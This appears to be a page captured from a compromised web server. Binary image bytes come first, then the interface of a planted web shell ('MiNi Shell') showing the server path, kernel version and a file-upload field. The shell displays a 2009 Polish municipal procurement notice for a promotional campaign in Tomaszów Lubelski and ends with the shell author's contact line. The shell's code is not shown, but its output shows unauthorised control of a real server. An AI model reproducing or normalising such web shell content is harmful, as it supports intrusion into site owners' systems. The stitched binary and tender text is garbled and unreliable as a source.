JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/51712-N-2009.html

<p class="kh_header"><b>Tomaszów Lubelski: Opracowanie i przeprowadzenie kampanii promocyjnej trzech podstref ekonomicznych zlokalizowanych na terenie gmin: Łuków, Janów Lubelski oraz Tomaszów Lubelski</b><br>
<b>Numer ogłoszenia: 51712 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Tomaszów Lubelski , ul. 29 Listopada 9, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6643085, faks 084 6643873.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszowlubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i przeprowadzenie kampanii promocyjnej trzech podstref ekonomicznych zlokalizowanych na terenie gmin: Łuków, Janów Lubelski oraz Tomaszów Lubelski.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest Opracowanie i przeprowadzenie kampanii promocyjnej trzech podstref ekonomicznych zlokalizowanych na terenie gmin: Łuków, Janów Lubelski oraz Tomaszów Lubelski zgodnie z założeniami przyjętymi w projekcie Stworzenie systemu wspierania i promowania podstref ekonomicznych w województwie lubelskim,  realizowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.
Wyszczególnione podstrefy wchodzą w skład Tarnobrzeskiej Specjalnej Strefy Ekonomicznej (TSSE) EURO-PARK WISŁOSAN. 
2.	Oczekuje się, że Wykonawca opracuje i wdroży wspólną kampanię promocyjną dla trzech wyżej wymienionych podstref.
3.	Cele kampanii: 
1)	poinformowanie potencjalnych inwestorów o atrakcyjności inwestycyjnej gmin, na terenie których funkcjonują podstrefy ekonomiczne wchodzące w skład TSSE EURO-PARK WISŁOSAN,
2)	zbudowanie pozytywnego wizerunku Ziemi Łukowskiej, Janowskiej i Tomaszowskiej jako przyjaznych miejsc do życia i prowadzenia działalności gospodarczej.
4.	Charakter kampanii: wielokanałowa kampania informacyjna z elementami budowania wizerunku.
Szczegółowy zakres opracowania zawarty jest w Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.14.16.00-5, 74.42.20.00-3, 74.40.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy spełniający warunki, o których mowa w art. 22 ust. 1 ustawy, w szczególności Wykonawcy niewykluczeni z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, oraz spełniający poniższe warunki szczegółowe:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2.	Dysponują niezbędną wiedzą i doświadczeniem, co oznacza, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej dwie kampanie promocyjne lub informacyjne o następujących cechach:
-	budżet każdej z kampanii na poziomie co najmniej 250 tys. zł 
-	kompleksowość, tj. wykorzystanie narzędzi z różnych dziedzin komunikacji marketingowej, w tym co najmniej relacji z mediami, wydawania publikacji, emisji reklam lub ogłoszeń płatnych w mediach masowych, działań marketingowych w Internecie, 
-	realizacja co najmniej dwóch Systemów Identyfikacji Wizualnej (SIW)
-	realizacja filmu lub spotu reklamowego na kwotę min. 100 tys. zł lub co najmniej dwóch filmów o wartości po 50 tys.
-	oparcie o założenia strategiczne będące dziełem własnym Wykonawcy, 
-	oparcie o badania rynkowe własne lub zlecone, 
-	sukces kampanii, rozumiany jako osiągnięcie zakładanych efektów,

3.	Dysponują osobami zdolnymi do wykonania zamówienia, w tym: 
-	co najmniej jedną osobą mającą minimum 2-letnie doświadczenie w zakresie utrzymywania relacji z mediami i pisania materiałów prasowych,
-	co najmniej jedną osobą z wykształceniem wyższym w zakresie socjologii, psychologii, komunikacji społecznej lub marketingu, mającą minimum 2-letnie doświadczenie w zakresie tworzenia planów kampanii promocyjnych, informacyjnych lub edukacyjnych, lub strategii albo planów marketingowych przedsiębiorstw, 
-	 co najmniej jedną osobą z wykształceniem wyższym plastycznym, mającą minimum roczne doświadczenie w tworzeniu prac plastycznych na potrzeby komunikacji marketingowej, 
-	 co najmniej jedną osobą mającą doświadczenie w organizowaniu co najmniej dwóch imprez promocyjnych lub wydarzeń specjalnych, w tym imprez zamkniętych i imprez otwartych.
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5.	Udokumentują posiadane doświadczenie, o którym mowa punkcie 2, z podaniem wartości zamówienia, daty i miejsca wykonania, nazwy i siedziby zamawiających oraz załączenia dokumentów potwierdzających należyte wykonanie zamówienia.

Zamawiający dopuszcza możliwość złożenia oferty wspólnej.

Ocena spełniania ww. warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, 
w oparciu o informacje zawarte w dokumentach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	Oświadczenie, że spełnia warunki art. 22 ust. 1 pkt. 1- 3  ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 2;

2)	Oświadczenie o nie podleganiu wykluczeniu na podstawie  art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 3;

3)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wg załącznika nr 6;

4)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej w zakresie objętym niniejszym zamówieniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

5)	Wykaz wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch kampanii promocyjnych lub informacyjnych, o cechach wymienionych w rozdziale IX, punkt 2, z podaniem  wartości przedmiotu zamówienia, dat wykonania, nazwy i siedziby zamawiających według wzoru stanowiącego załącznik nr 5;

6)	 Dokumenty poświadczające należytą realizację ww. kampanii, w postaci listów referencyjnych, oświadczeń klientów, dokumentacji pomiarów efektywności lub wyróżnień w konkursach branżowych i innych dokumentów wskazujących, że wskazane prace zostały wykonane należycie;

7)	Informację, czy Wykonawca zamierza korzystać z podwykonawców, wraz ze wskazaniem tych podwykonawców i zakresu prac, które zamierza im podzlecić; 

8)	Umowa spółki cywilnej (dla przedsiębiorców spółek cywilnych);

9)	Pełnomocnictwo (jeżeli dotyczy).

2. Pozostałe dokumenty jakie Wykonawca winien złożyć:

1)    Wypełniony formularz oferty - załącznik nr 1.
2)    Zaakceptowany wzór umowy, stanowiący załącznik nr 4.
3) Szczegółowy opis sposobu realizacji przedmiotu zamówienia, zawierający 
  w szczególności - zał. nr 8:
a)	opis źródeł pozyskania informacji niezbędnych do opracowania strategii kampanii promocyjnej,
b)	wykaz i opis poszczególnych narzędzi komunikacji marketingowej przewidzianej w kampanii wraz ze wskazaniem oczekiwanego stopnia ich efektywności,
c)	opis metod wykorzystywanych przy wykonywaniu kreacji poszczególnych elementów kampanii promocyjnej,
d)	opis potencjału technicznego i organizacyjnego Wykonawcy zaangażowanego w realizację poszczególnych zadań w ramach przedmiotu zamówienia,
e)	szczegółowy harmonogram prac uwzględniający podział zadań pomiędzy członków zespołu oraz terminy rozpoczęcia i zakończenia wykonanych usług, o których mowa w rozdziale I, punkt 5 niniejszego SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 40</li>
<li>2 - Podejście metodologiczne przy opracowywaniu i realizacji kampanii promocyjnej - 30</li>
<li>3 - Doświadczenie oraz posiadany potencjał techniczny i organizacyjny do zrealizowania poszczególnych usług w ramach przedmiotu zamówienia - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tomaszowlubelski.pl zakładk Bip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Tomaszowie Lubelskim
ul. 29 Listopada 9
22-600 Tomaszów Lubelski.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 12:00, miejsce: Urząd Gminy w Tomaszowie Lubelskim
ul. 29 Listopada 9
22-600 Tomaszów Lubelski
pok. nr 10 Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com